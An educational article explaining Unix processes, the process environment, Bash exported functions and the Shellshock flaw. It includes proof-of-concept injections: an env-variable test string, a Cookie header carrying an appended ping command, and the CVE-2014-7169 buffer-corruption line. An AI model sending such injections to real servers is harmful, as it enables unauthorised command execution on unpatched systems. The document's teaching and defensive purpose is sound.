Shellshock and the Story of the Environment

At the turn of September and October 2014 the world learned of a security vulnerability that had been lurking for years in the GNU Bourne Again Shell (a.k.a. Bash). Most IT-security outlets had already covered the topic and published appropriate remediation methods, yet what caught my attention was the educational aspect of the flaw – in that regard it is a “good bug”, that is, one that can be used to explain many interesting mechanisms present in Unix-like systems.

The Shellshock vulnerability (also known as Shelldoor or Bashbleed) is a security flaw in the Unix shell Bash that allows local (LCE) and remote (RCE) execution of arbitrary code with the privileges of the user who runs it. It is dangerous because many widely available network services rely on the shell indirectly – for instance, web servers equipped with CGI interfaces, DHCP servers, and not uncommonly mail servers or PHP applications that invoke the shell in order to launch a program within the proper environment.

The root cause of the bug in Bash is insufficient filtering of input data coming from the environment inherited from the parent process. It allows so-called exported shell functions to be used as a vehicle for smuggling arbitrary commands into a spawned shell process. Commands injected this way are executed by the shell immediately after start-up, at the moment it reads the received set of environment variables.

As a result, a potential attacker can influence the behaviour of services and modify their resources. In the best case this means discrediting a given network service; in the worst case – taking control of the entire system (when the service runs with administrator privileges or additional flaws are found).

Let’s assume that we know little about Unix-like systems, that the word “shell” reminds us of a sea creature’s armour rather than a command interpreter, and that “environment” brings to mind ecology rather than a data structure. To understand the topic thoroughly, we need to recall:

What characterises Unix-like systems?
What is a Unix shell?
How does a process differ from a program, and what is an environment?
How does Bash handle the environment and what are environment variables?
What conditions trigger the flaw in Bash?
What other vulnerabilities were found along the way?
How were the problems resolved?

If the operating-system mechanisms governing process environments are not new to you, you know what execve() and fork() do, and you are also aware that the environment can contain not only variables but arbitrary strings, skip ahead to the technical descriptions of the flaws themselves.

Introduction

Long, long ago almost every user of a computer system was a programmer. Those were the days of environments in which the “conversation” with the operating system was carried out through an integrated code editor and debugger. Unixes had not yet risen to prominence, and the relational databases that are commonplace today – running on dedicated machines – existed only in the dreams of the people selling those machines. Data were code, code were data, and a programmer could reach into their structures without wondering where they were actually stored. The age of mainframes.

IT security as an industry practically did not exist, systems had no effective division into users with different access levels, and anyone who could use a terminal enjoyed unrestricted access to almost every service and piece of data within the system. One might think that from an IT-security perspective this was – to put it colloquially – a spectacular failure. Perhaps, but the asset-protection model was also somewhat different, and had it evolved along the trajectory established at that time until the present day, security flaws might have been fewer in number and would certainly have had a different character.

When thinking about the monolithic systems of the past, it is worth remembering that they were closer to today’s virtual machines than to multi-user operating systems. This means that defence against cyber threats was possible, but it operated at the level of access to a service or even to the memory structures managed by a programming-language interpreter, rather than as a generalized network or system-level shield. One may speculate that had the IT-security business not proposed defensive models that abstract protection processes and correlate them with organisational structures, but instead moved towards developing ways of blocking unwanted activity at-core (within a service, an application, or even a programming language), those environments – were they to exist today – would embody what we now call the zero trust approach.

Unix

The arrival of Unix shook the technology industry. Not because of particularly advanced technical solutions or user-friendliness, but because of an architecture that allowed one to adapt the system to one’s own needs and to create clones tailored to specific requirements at low cost. This was tied, among other things, to decoupling the system from the hardware, as well as to the ability of its buyer to work with many software vendors rather than a single institution that produced both the system and every application running under its control.

Functional languages that were hard for beginners to pick up quickly, and interpreters oriented towards solving specific business problems, gave way to universal tools written in C and shell scripts. The former were compiled into machine code optimised for the hardware architecture. Meanwhile, the architectural division of the system into small, cooperating parts lowered the competency bar for technical support – an administrator was a machine operator, not an all-round specialist in everything from data management to programming.

Unix is, in essence, a set of cooperating components, each performing a specific task. A system architect can integrate selected components in order to build an environment for a particular purpose. This also translates into the final price, which was not without influence on the popularisation of Unix. It is also worth noting that Unix vendors were very effective promoters. Before long, the bulk of technical-school graduates entered the job market with practical skills in C programming and the use of Unix commands and services. The creators of Unix – Dennis Ritchie and Ken Thompson of Bell Labs – had managed to build a universal, multi-user, multi-process, networked, time-sharing operating system that nearly every institution could afford.

For the operator’s “chats” with the system, purpose-built software was used. Naturally, one could have continued the programming tradition and used, say, Lisp – one of the most illustrious programming languages, popular once and now, thanks to projects such as Clojure, enjoying a second youth. It would have served as a system user interface, but only on condition that the user already had experience with it (was de facto a programmer). For someone who simply wants to start or stop a service, copy a file, or inspect event-log files, a far better tool is a tailor-made interpreter whose commands and syntax can be learned in a few hours.

The shell

Every computer system meant to be operated by a person who is not a programmer deserves a communication interface that lets them browse the computer’s resources, launch applications, issue commands, and view the results. Such an interface can be graphical (e.g., Apple’s Finder) or textual (e.g., COMMAND.COM from MS-DOS, or Unix’s bash). It will certainly accept input via the keyboard (and possibly a mouse) and present the results on the computer’s monitor (or a remote terminal). We call this an interactive system shell – one through which a user can communicate with the OS in real time.

A system shell (or simply shell) is a computer program like any other. Its function is to provide the conditions for performing basic operational tasks such as accessing files and directories or launching programs.

Interactive shell is the foreground process (running program) that executes issued commands on the fly and displays their results, whereas non-interactive shell do the same things but without supervision from a human operator. In Unix-like systems an interactive shell is launched with the credentials of an authenticated user by software that provides local or remote access to the system (e.g., the login program or the sshd daemon).

The pathname of the default shell assigned to a given user can be found in the password file /etc/passwd or another database (e.g., LDAP or NSS, if in use). In most cases a shell that can work interactively also supports a non-interactive mode.

Modern shells contain a sophisticated command interpreter. This enables them not only to accept individual commands or sequences thereof, but also to interpret and execute scripts – simple programs written using the appropriate internal and external commands.

Internal commands are those whose actions are carried out directly by the shell’s own subroutines within its own program, whereas external commands are other utility programs residing on a storage medium – for example, the familiar Unix tools ping, grep, awk, sed, or mc (Midnight Commander). They are invoked while the shell waits in the background for them to finish and records each one’s exit status.

The first shell in Unix (and in its predecessor, the Multics system) was the Thompson shell, created in 1971. It was written by – as the name suggests – the co-creator of the system. It was a simple command interpreter, lacking the ability to execute scripts. Its innovation compared to the operating systems of the day was treating the shell as a standalone utility program rather than part of the kernel. From a security standpoint this seems a sensible move, since any flaw would have meant taking control of the entire system.

When mentioning the Thompson shell it is worth recalling that it was the first to employ the stream-redirection operators < and > as well as the pipe operator | – a convention later adopted by most known shells.

Program and process

We mentioned earlier that the system shell is a computer program. This means that somewhere on a storage medium (e.g., a hard disk) there is a data set with a beginning, a defined length, a certain name, and other attributes (for instance, an access-mode word specifying who may access the data and in what mode – e.g., write, read, or execute). We call such a data set a file.

In Unix-like systems the goal is for everything to be a file, or more precisely, for most system objects to be communicable through files that represent their input and output. To make this possible, some files are so-called special files. Their contents do not reside on disk but are generated dynamically and depend on a subroutine associated with the special file (e.g., a device driver).

Back to the definition of a program. A program is a set of machine instructions and the data needed for their proper execution, placed in memory or in a so-called executable file. An executable file is one designated for running and containing a program image. What is a program image? It is a chain of CPU-intelligible instructions shaped according to the rules of one of the executable formats. Popular Unix formats include, for example, a.out (short for assembler output) and Executable and Linkable Format (a.k.a. ELF).

Thanks to a known executable format the system knows what a program needs in order to load and work properly. An example might be shared libraries that the application must reference – at an appropriate, standard-defined location within the executable file one finds references to the required libraries or even to the interpreter that will correctly load and execute the code (in the case of the ELF format, the PT_INTERP segment).

A process is, as we mentioned, a running program – or, to be more linguistically precise, the execution of a program. When the processor executes machine code placed in RAM, we can speak of a running process.

From the system’s perspective, a process denotes not only the act of carrying out a task, but also a more tangible quality: a data structure in memory managed by the kernel, through which the OS controls the correct course of the process – among other things, it ensures fair time-slicing, memory allocation, access to hardware resources, and mechanisms for exchanging data with other processes. This means that every time a program is loaded into memory for execution, a corresponding control structure is created (e.g., in GNU/Linux, task_struct defined in the header file sched.h), containing, for instance, privilege-related identifiers (UID, GID, EUID, EGID, SUID, SGID, FSUID, FSGID), information about the parent and children, scheduling data, and so on.

The way to load a program from disk and run it is to ask the kernel to perform such an operation. To this end, a running program should use the system call named execve, whose C-language declaration looks as follows:

int execve(const char *filename,
                 char *const argv[],
                 char *const envp[]);


int execve(const char *filename,
                 char *const argv[],
                 char *const envp[]);

We can see that it takes three arguments:

the pathname of the file to load
(as a pointer to a null-terminated character string),
command-line arguments
(as a constant pointer to an array of character strings),
and the environment
(likewise a constant pointer to an array of character strings).

The arrays holding arguments and environment should be terminated with a null pointer (NULL – zeroed value representing a memory address), and each character string (i.e., each character array) – like the first argument – should be terminated with a zero byte.

The kernel will check whether the process has permission to run the program and will attempt to load it from the file into free memory. If this operation succeeds, the current process (in the sense of the structure maintained by the kernel) will be associated with the newly loaded machine code, which will begin executing. This means that upon a successful execve() call, the program image that had been running within the current process ceases to exist, and its associated memory structures (code segment, initialized-data segment, uninitialized-data segment, as well as the stack and heap segments) are freed. What is inherited is the process’s identifier (PID).

Given the above, we also need a mechanism that would let a running program “bring to life” an additional process so that this second one can load a new program, ending its own previous work. Otherwise we could only have a single application running at a time – within a single process, program images and data would simply keep replacing one another.

Fortunately such a system call exists, and it is called fork. The process that invokes it becomes the parent process with respect to the newly created one, and shares code and most parameters with it. The child process can recognize that it is the child because in its thread of execution fork() returns 0. The new process can now safely call execve() and load a program “into itself”. The parent process, in turn, can supervise the execution of its child while waiting for it to finish – this is exactly how the shell behaves when we issue an external command.

Inter-process communication

Programs that communicate solely with the user and occasionally ask the kernel for resource access are boring programs, and if they could dream, their only fantasy would probably be to hang. They feel best when “talking” to one another. That is why system architects once came up with the idea of implementing inter-process communication (IPC) methods – ways of exchanging information between running programs.

We can distinguish remote communication, involving systems visible on the network; an example of a mechanism for this would be sockets.

Richer in terms of the number of mechanisms, however, is local communication, used within a single system. Its examples include: signals, semaphores, shared memory, message queues, pipes, named pipes, Unix domain sockets, command-line arguments, ordinary files, memory-mapped files, and the environment.

IPC objects are created and removed by the kernel upon invocation of specific system calls by the software that needs them. Some allow two-way communication (sockets, shared memory, files), while others only permit sending a message or signalling some state without obtaining feedback through the same channel (signals, arguments, the environment, messages, individual pipes).

The Shellshock vulnerability is connected to the last-named mechanism in this second group – namely, the environment.

The process environment

The environment is an inter-process communication mechanism that allows a one-way transfer of a certain set of information – in the form of a set of character strings – to a program being loaded into memory. It resembles sending a letter from a program already running on the system to a program that is only now being loaded by it. When the latter starts working and becomes a process, it will have the transmitted environment information at its disposal.

The environment is typically used to control the behaviour of the invoked program – provided, of course, that the launched program makes use of the received environment data.

One might therefore ask: why use the environment when we have command-line arguments that also allow this?

An important property distinguishing environment-based communication from argument-based invocation is inheritance. It is carried out automatically by the system when forking a child process, and also by a widely followed convention in which, when calling execve() – or the wrapper functions execle() and execvpe() – a copy of the current environment is passed to the loaded program. The frequently used program-loading functions execl(), execlp(), execv(), execvp(), system(), and popen() likewise forward the existing environment.

The size of the transmitted environment is limited. In newer Linux kernels it depends on the value of RLIMIT_STACK, which an administrator can set for certain process groups, and amounts to a maximum of one quarter of the stack size (so that the stack is not entirely consumed by the environment). The system also ensures that despite these limits the size is never less than 32 memory pages (which, at a page size of 4 KB, gives a limit of 128 KB). The limit for a single character string is defined by the kernel constant MAX_ARG_STRLEN and is likewise 32 pages (in Linux kernel 2.6.23). The maximum number of strings is 0x7FFFFFFF (2,147,483,647 in decimal) – this follows from the range of the int32_t type (a 32-bit signed integer).

At the system level the only requirement is that the environment be an array of character strings (i.e., an array of character arrays) terminated by a null pointer (NULL), and that each pointer in it reference a character array terminated with a zero byte. The entries need not even be conventional name–value pairs; they can be arbitrary data, for instance:

A perfectly valid
environment passed
to the launched program
A=1
B=2


A perfectly valid
environment passed
to the launched program
A=1
B=2

When loading a new program via execve(), one can pass an environment – the aforementioned array – to the launched application. In GNU/Linux it will be stored (after copying) in the mm_struct structure (fields env_start and env_end), whose pointer field named mm resides in the previously mentioned control structure task_struct that describes the task thread executed by the system.

Let us try to write a simple program that creates an appropriate environment and passes it to an invoked /bin/bash shell. We will supply the shell with an option that causes it to display its own environment and exit.

Create a file pass-environment.c with the following contents:

#include <unistd.h>

int main(int argc, char *argv[])
{
  /* environment array */
  char *const environment[] = {
    "perfectly valid",
    "environment passed",
    "to the launched program",
    "A=1",
    "B=2",
    (char *) NULL
  };

  /* invocation arguments */
  char *const arguments[] = {
    "sh",
    "-c",
    "tr '\\0' '\\n' < /proc/$$/environ",
    (char *) NULL
  };

  return execve( "/bin/bash", arguments, environment );
}


#include &lt;unistd.h&gt;

int main(int argc, char *argv[])
{
  /* environment array */
  char *const environment[] = {
    &#34;perfectly valid&#34;,
    &#34;environment passed&#34;,
    &#34;to the launched program&#34;,
    &#34;A=1&#34;,
    &#34;B=2&#34;,
    (char *) NULL
  };

  /* invocation arguments */
  char *const arguments[] = {
    &#34;sh&#34;,
    &#34;-c&#34;,
    &#34;tr &#39;\\0&#39; &#39;\\n&#39; &lt; /proc/$$/environ&#34;,
    (char *) NULL
  };

  return execve( &#34;/bin/bash&#34;, arguments, environment );
}

Compile it with GCC and run:

gcc -Wall ./pass-environment.c -o ./pass-environment
./pass-environment


gcc -Wall ./pass-environment.c -o ./pass-environment
./pass-environment

We should see a listing similar to the following:

perfectly valid
environment passed
to the launched program
A=1
B=2

What happened? We loaded the shell, passing it a specially crafted environment containing two name-value pairs and several plain-text strings. We also passed the shell an option (-c) in the form of an argument instructing it not to wait for interactive commands but to execute the given command sequence (c for command), which can be presented more readably as:

tr '\0' '\n' < /proc/$$/environ


tr &#39;\0&#39; &#39;\n&#39; &lt; /proc/$$/environ

Readers familiar with the shell built-in set and the external tools env and printenv may wonder why we did not use those instead. In the case of the latter two, the reason is that they would be invoked in a child process because they are external commands; as for set, it would show all shell variables (and functions), not the environment, even though some of those variables may have come from the environment or be destined for it. In none of these cases would the current shell process’s environment be accurately represented.

Using the procfs pseudo-filesystem gives us access to the pseudo-file /proc/[PID]/environ, whose contents reflect the environment of the process with a given process identifier (PID). To learn the shell’s own PID, we use the special variable $$.

The data obtained are in a “raw”, unprocessed form, and we need to replace all zero bytes with newlines. The external tool tr makes this easy.

As a result, the screen shows exactly the environment we would expect, including the strings we placed there. Whether Bash actually makes use of them is another matter. We can check by modifying our program slightly:

#include <unistd.h>

int main(int argc, char *argv[])
{
  /* environment array */
  char *const environment[] = {
    "perfectly valid",
    "environment passed",
    "to the launched program",
    "A=1",
    "B=2",
    (char *) NULL
  };

  /* invocation arguments */
  char *const arguments[] = {
    "sh",
    "-c",
    "exec printenv",
    (char *) NULL
  };

  return execve( "/bin/bash", arguments, environment );
}


#include &lt;unistd.h&gt;

int main(int argc, char *argv[])
{
  /* environment array */
  char *const environment[] = {
    &#34;perfectly valid&#34;,
    &#34;environment passed&#34;,
    &#34;to the launched program&#34;,
    &#34;A=1&#34;,
    &#34;B=2&#34;,
    (char *) NULL
  };

  /* invocation arguments */
  char *const arguments[] = {
    &#34;sh&#34;,
    &#34;-c&#34;,
    &#34;exec printenv&#34;,
    (char *) NULL
  };

  return execve( &#34;/bin/bash&#34;, arguments, environment );
}

The result will be:

A=1
B=2
PWD=/home/randomseed
SHLVL=0

The keen eye of an attentive reader will notice that some of the transmitted strings are missing from the output. Outrageous! Scandalous! Who is to blame?

In the previous example we ruled out the shell process itself removing our phrases from the environment; what remains is the possibility that Bash ignores them. Notice that the invocation /bin/bash -c exec printenv replaces the shell process with the loaded program (the built-in exec command is responsible for this). The displayed contents are therefore not a reflection of the environment of the originally launched shell process but of the printenv that replaced it.

Where, then, do the entries originating from the initially created environment (A=1, B=2) come from, along with the new ones of unknown provenance (PWD=/home/randomseed, SHLVL=0)? It turns out that the shell copied its own environment and, after adding certain data, used the resulting set to initialize the environment for the loaded printenv program.

Conclusion: the shell ignores entries in the environment that it cannot process (they are unintelligible to it); these entries are not copied into the environments of processes launched by the shell, but they are not removed from the shell’s own memory either.

It is worth remembering that when using Bash or a similar Unix shell we are not operating directly on the process’s environment, even though the manuals repeatedly speak of adding or removing data from the environment.

By using built-in commands such as set (typeset), unset, or export, we affect the shell’s internal data structures but not the memory area actually associated with the environment. That area is modified and set up lazily – that is, only when necessary, for example when another program is loaded (within the current process or in a newly created child process).

The above can be observed by compiling and running the following code:

#include <unistd.h>

int main(int argc, char *argv[])
{
  /* environment array */
  char *const environment[] = {
    "A=1",
    "B=2",
    (char *) NULL
  };

  /* invocation arguments */
  char *const arguments[] = {
    "sh",
    "-c",
    "export E='NEW' ; pi=$$ ; "
    "echo 'Bash process:'  ; "
    "cat /proc/$pi/environ  | tr '\\0' '\\n' ; "
    "echo ; "
    "echo 'Child process:' ; "
    "cat /proc/self/environ | tr '\\0' '\\n' ; "
    "echo ; "
    "echo 'Same process, different program:' ; "
    "exec printenv",
    (char *) NULL
  };

  return execve( "/bin/bash", arguments, environment );
}


#include &lt;unistd.h&gt;

int main(int argc, char *argv[])
{
  /* environment array */
  char *const environment[] = {
    &#34;A=1&#34;,
    &#34;B=2&#34;,
    (char *) NULL
  };

  /* invocation arguments */
  char *const arguments[] = {
    &#34;sh&#34;,
    &#34;-c&#34;,
    &#34;export E=&#39;NEW&#39; ; pi=$$ ; &#34;
    &#34;echo &#39;Bash process:&#39;  ; &#34;
    &#34;cat /proc/$pi/environ  | tr &#39;\\0&#39; &#39;\\n&#39; ; &#34;
    &#34;echo ; &#34;
    &#34;echo &#39;Child process:&#39; ; &#34;
    &#34;cat /proc/self/environ | tr &#39;\\0&#39; &#39;\\n&#39; ; &#34;
    &#34;echo ; &#34;
    &#34;echo &#39;Same process, different program:&#39; ; &#34;
    &#34;exec printenv&#34;,
    (char *) NULL
  };

  return execve( &#34;/bin/bash&#34;, arguments, environment );
}

We now know how the environment is passed, so it is worth mentioning the ways in which a running program can access its own environment. The first uses the arguments of the main function:

#include <stdio.h>

int main(int argc, char *argv[], char *envp[])
{
  char **v;

  for(v = envp; *v != NULL; ++v)
    printf("%s\n",*v);

  return(0);
}


#include &lt;stdio.h&gt;

int main(int argc, char *argv[], char *envp[])
{
  char **v;

  for(v = envp; *v != NULL; ++v)
    printf(&#34;%s\n&#34;,*v);

  return(0);
}

The second uses the external variable environ, defined by the C standard library:

#include <stdio.h>

int main()
{
  extern char **environ;
  char **v;

  for(v = environ; *v != NULL; ++v)
    printf("%s\n",*v);

  return(0);
}


#include &lt;stdio.h&gt;

int main()
{
  extern char **environ;
  char **v;

  for(v = environ; *v != NULL; ++v)
    printf(&#34;%s\n&#34;,*v);

  return(0);
}

Environment variables

An environment variable is a variable – a construct possessing a symbolic name and a value – whose storage location is the environment of a running program. In the earlier examples we deliberately avoided this term in order to emphasise that for the operating system it does not matter whether the environment holds variables or other constructs.

Shell programmers, many application developers, and even the C standard library take a more conservative view of the environment. For them it is a repository of name–value pairs, e.g.:

A=1
B=2
C=TEXT
D=


A=1
B=2
C=TEXT
D=

Notice that there are no defined data types for the given values (all of them are originally character strings). Typing is therefore a matter of convention or detection and depends on the receiving process.

The C standard library defines appropriate functions for managing environment variables: getenv(), setenv(), unsetenv(), putenv(), and clearenv(). All except the last operate exclusively on variables, which are detected by requiring the presence of the = character. If the environment contained a character string other than one defining a variable, it would not be possible to selectively remove or overwrite it (replace it with a variable of the same name) using these functions.

The environment in Bash

In the case of Bash we encounter an interesting situation – it implements its own versions of the functions responsible for handling environment variables. The changes consist mainly in the fact that reads and writes of variables are buffered – that is, they do not operate on the environment directly but on internal structures. From these structures environments are then constructed on the fly and passed to child processes or to a process replacing the shell (the built-in exec command).

When we look at how Unix-like systems boot – remembering that the only way to create a new process is to fork the current one using fork() – we can appreciate the advantage of environment inheritance. System start-up scripts can set certain environment variables useful to all running programs, which will then propagate and reach the start-up scripts of individual services; these in turn can add service-specific variables to their environments. The same applies to the environment settings of user-launched applications – they inherit environments from shell processes, which in turn receive them from services providing access to the system (e.g., login or sshd), and so on.

Some applications allow the user to manage variables in their environment directly (via an interactive interface, inter-process communication, or configuration files). This is useful when appropriate variables that influence a program’s behaviour need to be set but cannot be set from the shell (which is the parent process), because, for example, the program is not launched by the shell or the shell starts too late (and it is its environment we want to prepare). Examples include the tables of the Cron scheduling daemon, as well as situations in which we want to influence the environment of a process (a shell or another program) at the moment a remote SSH connection is established (by sending environment data over the network).

Variables and functions

The Bash shell interpreter lets you use variables and functions. The former are used to store data, the latter to create subroutines and operate on the former. A variable in Bash can have a defined scope that determines where in the script it can be used. By default, variables are global – that is, once defined they are visible throughout the script executed by the current process. This behaviour can be changed with the local scope modifier placed before the variable name at the point of its first use. Such a variable will be visible only within the function in which it appeared.

A common mistake among beginners is assuming that global variables will be shared with child processes of the shell. This specifically concerns commands that, because they receive output from other commands, force Bash to create an additional execution thread. An example is the read command, which reads data from the standard output of echo:

1#!/bin/bash
2
3l="empty"
4echo "123" | read l
5echo "${l}"


#!/bin/bash

l=&#34;empty&#34;
echo &#34;123&#34; | read l
echo &#34;${l}&#34;

After running the script, instead of the expected 123, the value of l will be the string empty. Why? To handle the redirected output from echo (via the pipe operator, which creates a communication link), the shell created a child process, and it was in that child that the built-in read command assigned a value to l. All data belonging to the additional process ceased to exist when it finished, including the variable l, which does have global scope – but within a given process whose data the parent cannot access directly. A solution to problems like this may be to forgo redirection and use a variable that stores the result of a previously executed command:

1#!/bin/bash
2
3l="empty"
4l=$(echo -e "123\n456")
5echo "${l}"


#!/bin/bash

l=&#34;empty&#34;
l=$(echo -e &#34;123\n456&#34;)
echo &#34;${l}&#34;

Another approach is to redirect the standard output of a subshell – a child process executing a separate command – to the standard input of read. In this case a child process is also created, but it will not attempt to modify l; that will be the parent process’s job:

1#!/bin/bash
2
3l="empty"
4read l < <(echo "123")
5echo "${l}"


#!/bin/bash

l=&#34;empty&#34;
read l &lt; &lt;(echo &#34;123&#34;)
echo &#34;${l}&#34;

More examples of dealing with subshells can be found on the Bash Hackers Wiki pages.

Exported variables

There is one more kind of Bash variable that can be distinguished by scope – shell environment variables, also known as exported variables. These are global-scope variables that will be placed in the environment of every child process of the shell and of every program that replaces the shell (when the built-in exec command is used).

The term “exported” is not very popular, but it aptly captures the difference between actual environment variables (stored in the environment of a given process) and global shell variables that are merely marked as ones that should end up there.

To mark a variable as destined for the environment, the export modifier is used; it can be applied at any point, e.g.:

 1export C
 2A=1
 3C=3
 4export B=2
 5export A
 6echo "------------------------------"
 7echo "Actual current environment:"
 8tr '\0' '\n' < /proc/$$/environ
 9echo
10echo "----------------------------"
11echo "Child-process environment:"
12printenv


export C
A=1
C=3
export B=2
export A
echo &#34;------------------------------&#34;
echo &#34;Actual current environment:&#34;
tr &#39;\0&#39; &#39;\n&#39; &lt; /proc/$$/environ
echo
echo &#34;----------------------------&#34;
echo &#34;Child-process environment:&#34;
printenv

Environmental functions

An environmental function is the Bash developers’ idea for propagating subroutines among child shell processes. It resembles the proverbial guinea pig, which is in reality neither a pig nor from Guinea. Let us take a look:

 1#!/bin/bash
 2
 3# define a function
 4myfunction () {
 5  echo "I am a function" ; a=2;
 6}
 7
 8# export the function
 9export -f myfunction
10
11# check whether the function
12# exists in the child
13# process's environment
14printenv | grep -A2 myfunction


#!/bin/bash

# define a function
myfunction () {
  echo &#34;I am a function&#34; ; a=2;
}

# export the function
export -f myfunction

# check whether the function
# exists in the child
# process&#39;s environment
printenv | grep -A2 myfunction

Running the script yields output similar to the following:

myfunction=() {  echo "I am a function";
a=2
}


myfunction=() {  echo &#34;I am a function&#34;;
a=2
}

What did we do? We created a Bash function and then marked it as exportable using export -f. In the child process’s environment (printenv) it appeared as an environment variable named myfunction whose value is exactly the body of our function.

It is worth noting that the interpreter had no trouble placing the = character inside the environment; its internal parser recognizes the values of environment variables as strings located between the first occurrence of = and the terminating zero byte.

Environment variables of this kind (carrying Bash functions) are propagated to all child processes, yet only Bash (or possibly other shells) can subsequently make use of them. This is reminiscent of the old days – and of present-day programming languages in which, thanks to the eval instruction, data can become code.

Automatic function definition

Environment variables that in reality contain Bash functions are recognizable by the parser thanks to a pair of parentheses and an opening brace at the start of the value. When the shell encounters such a pattern, the character string from the environment is passed to the interpreter in order to define the function within the current process. For example:

1#!/bin/bash
2
3export myfunction="() {  echo 'I am a function'; }"
4bash -c myfunction


#!/bin/bash

export myfunction=&#34;() {  echo &#39;I am a function&#39;; }&#34;
bash -c myfunction

Note: this example will not work in newer, patched releases of Bash.

In the above example we called the function myfunction() in a child process even though it did not exist in the parent; it was recorded there as a variable destined for the environment. When invoked again, Bash (bash -c myfunction) examined the received environment and detected that it was dealing with an exported function. The function was therefore defined under the name myfunction and then invoked (because of the -c myfunction argument).

Imperfections

The environment parser present in Bash is not as flawless as one might think. It turns out that when it encounters an appropriately crafted environment variable that is supposed to contain a function definition, it can also execute additional commands. Consider the following example:

1#!/bin/bash
2
3export myfunction="() { echo 'I am a function'; } ; echo 'I am outside'"
4bash -c myfunction


#!/bin/bash

export myfunction=&#34;() { echo &#39;I am a function&#39;; } ; echo &#39;I am outside&#39;&#34;
bash -c myfunction

This example is similar to the previous one, but this time, in addition to the function body enclosed in braces, we placed a command after the command separator (semicolon). As a result, two strings appeared on the screen:

I am outside
I am a function

Note: this example will not work in newer, patched releases of Bash.

It turns out that the process of interpreting an environment variable as code defining a function does not stop at the closing brace but continues until the end of the value string. That is why at start-up the shell displayed I am outside (the echo command was issued during the reading of the environment), and only then did the result of calling myfunction() appear.

The Bash developers quickly fixed this bug, eliminating the possibility of appending commands after a function definition. It turns out, however, that this does not protect against all threats…

The Shellshock vulnerability

On 24 September 2014 the IT world was rocked by sensational news: in the popular Bash shell a vulnerability (CVE-2014-6271) had existed for nearly 15 years, through which one could locally – and under certain conditions also remotely – execute arbitrary commands with the privileges of the service. The only requirement is the ability to control the environment of the shell process. The discoverer turned out to be Stephane Chazelas – an IT department manager at the British company SeeByte Ltd, who is passionate about open-source software, especially that which runs on Unix and GNU/Linux systems.

The flaw consisted in the ability to smuggle arbitrary commands by appending them to environment variables containing shell-function definitions. This is exactly the mechanism we demonstrated in the last example, although on the Web one can find a condensed version of the proof-of-concept code:

env x='() { :;}; echo VULNERABLE' bash -c exit


env x=&#39;() { :;}; echo VULNERABLE&#39; bash -c exit

Why did administrators react with panic, and why did the package maintainers of GNU/Linux distributions and other Unixes begin en masse visiting mental-health specialists and massage parlours? After all, the flaw can only be exploited when one already controls the shell’s environment, and so – following the earlier examples – the user would have to be sabotaging themselves!

Unfortunately it turns out that over the years the authors of various tools and network services had trusted environment variables as a mechanism that is well understood and seemingly too simple to harbour any serious weaknesses. The environment itself (from the system’s point of view) certainly is that simple; the problem arises when the ubiquitous Bash misuses it and turns data into instructions.

Why ubiquitous? Many library functions and script subroutines across the most diverse interpreters, when they want to launch a process, do not load it directly but as a shell command to be executed. For example, a web script might use a shell-invoked convert command to resize images:

/bin/sh -c "convert %f -resize 1024x1024 "


/bin/sh -c &#34;convert %f -resize 1024x1024 &#34;

Thanks to this approach the programmer does not need to build separate mechanisms for setting search-path variables (i.e., PATH or LD_LIBRARY_PATH), configuration files that will launch the right programs, routines that prepare the working environment, etc. It suffices to delegate these tedious and laborious tasks to the shell along with its global and per-user configuration files.

Examples of situations in which the environment of a launched program is controlled by an untrusted client, or in which the client is trusted but can dangerously escalate their ability to perform certain operations, include:

some mail servers, particularly those that invoke the shell when delivering messages to external filters (e.g., Procmail) or that rely on short, flexible scripts (qmail);
the Apache web server with CGI enabled (module mod_cgi or mod_cgid), if the executed scripts are written in Bash or invoke it, e.g., via the aforementioned system() or popen() functions;
the OpenSSH server when the ForceCommand option – whose purpose is to restrict executable commands – is enabled, and also when public keys with a command clause are in use (command injection bypasses the restriction);
DHCP clients that pass parameters received from servers to their scripts via environment variables – in many cases it is possible to execute malicious code with administrator privileges;
executables with the set-user-ID-on-execution (setuid) or set-group-ID-on-execution (setgid) bit enabled when they inherit the environment – privilege escalation and execution of commands as another user or even as the administrator are then possible if the application invokes the shell, e.g., via system() or popen().

Example of a vulnerable web server

Let us see how a remote attacker can exploit the Shellshock flaw by attacking a vulnerable web server. A necessary condition is that HTTP headers originating from the client are passed to the application server in the form of environment variables. The application server can be, for instance, a CGI script spawned each time a request needs handling.

Suppose the client set the Cookie header as follows:

Cookie:() { :; }; ping -c 3 randomseed.pl

After the HTTP connection is established, the header reaches the web server which, wanting to pass it to the CGI application, adds an environment variable:

HTTP_COOKIE=() { :; }; ping -c 3 randomseed.pl

The invoked interpreter (e.g., PHP) accepts the environment and, wanting to resize an image, executes:

system("convert -size 300x300 img.jpg -resize 200x200 img_s.jpg");


system(&#34;convert -size 300x300 img.jpg -resize 200x200 img_s.jpg&#34;);

The PHP function named system used here is the counterpart of the same function from the C standard library. The latter in turn does not launch the convert program directly but invokes the shell, passing it the command and arguments. The shell inherits the environment, and if it happens to be Bash, it begins importing functions whose definitions it finds in the values of variables.

In a version vulnerable to the flaw, the command ping -c 3 randomseed.pl will be executed with the privileges of the application server, sending three echo-request packets and thus informing the other end that the server is running an affected release of Bash.

The first patch

The Bash developers quickly released an appropriate patch, identified as bash43-025, which eliminated the vulnerability.

The fix introduced two processing modes into the function parse_and_execute() – identified by SEVAL_FUNCDEF and SEVAL_ONECMD. When called in the first mode, the parser skips commands other than function definitions. The second mode prevents more than one found command from being executed. As a result, the exploit presented earlier no longer works because commands appended after the function body are not interpreted.

The buffer flaw

Users’ and administrators’ relief did not last long. Tavis Ormandy, a Google-affiliated specialist in software vulnerabilities, found a similar flaw. A new vulnerability had to be registered in the bug database – it received the identifier CVE-2014-7169.

The malicious shell code demonstrating the bug looked as follows:

env X='() { (a)=>\' sh -c "echo date"; cat echo


env X=&#39;() { (a)=&gt;\&#39; sh -c &#34;echo date&#34;; cat echo

Running this command on a vulnerable interpreter causes the creation of a file named echo containing the output of the date command, followed by displaying its contents on screen. The method used to mislead Bash also exploits a parser weakness during environment reading, but the technique is quite different. Here we are dealing with a deliberate corruption of the buffer used for storing commands to be executed.

To explain what exactly happens, we will use a more accessible example:

1#!/bin/bash
2
3export X='() { function a a>\'
4bash -c 'echo date'


#!/bin/bash

export X=&#39;() { function a a&gt;\&#39;
bash -c &#39;echo date&#39;

We know that when a new shell process (bash) starts, environment variables are analysed. The contents of one of them – because of the leading parentheses and opening brace – are treated as the beginning of an exported shell-function definition. At this point it is worth noting that Bash does not execute commands immediately; instead they first go into a special buffer. The buffer is helpful because some syntactic elements require analysis of their neighbours. A vivid example is:

1#!/bin/bash
2
3echo one \
4two \
5three


